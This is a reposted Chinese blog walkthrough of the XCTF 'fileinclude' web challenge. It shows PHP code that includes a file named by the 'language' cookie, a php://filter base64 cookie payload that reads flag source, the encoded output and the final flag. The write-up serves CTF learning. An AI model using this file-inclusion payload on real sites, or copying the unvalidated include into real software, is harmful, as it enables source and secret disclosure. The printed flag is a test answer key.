返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >攻防世界WEB练习-fileinclude
  • 710
分享到

攻防世界WEB练习-fileinclude

php开发语言 2023-09-20 11:09:42 710人浏览 八月长安
摘要

前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 攻防世界专栏:https://blog.csdn.net/m0_63127854/ca

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

题目场景

F12/Ctrl+U查看源码

代码分析

bp抓包

找到flag


题目场景

F12/Ctrl+U查看源码

代码分析

PHP

if( !ini_get('display_errors') ) {

  ini_set('display_errors', 'On');

  }

error_reporting(E_ALL);

$lan = $_COOKIE['language'];

if(!$lan)

{

@setcookie("language","english");

@include("english.php");

}

else

{

@include($lan.".php");

}

$x=file_get_contents('index.php');

echo $x;

?>

源代码中看到` @include($lan.".php"); `,可知此处存在文件包含。

`$lan`的值是从cookie中传过来的。所以对`language`赋值,构造payload,重放包就可读出flag.php经过base64加密后字符串,base64解密后得到flag。

bp抓包

构造payload

Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

注意这里是flag而不是官方提到的flag.php

base64解码

PD9waHANCiRmbGFnPSJjeWJlcnBlYWNle2Y2NzUyNWI4NWNiY2NiZGZhNGMwNTYwN2ZmZjdjZTM0fSI7DQo/Pg=

找到flag

cyberpeace{f67525b85cbccbdfa4c05607fff7ce34}

来源地址:https://blog.csdn.net/m0_63127854/article/details/126632632

--结束END--

本文标题: 攻防世界WEB练习-fileinclude

本文链接: https://www.lsjlt.com/news/412374.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作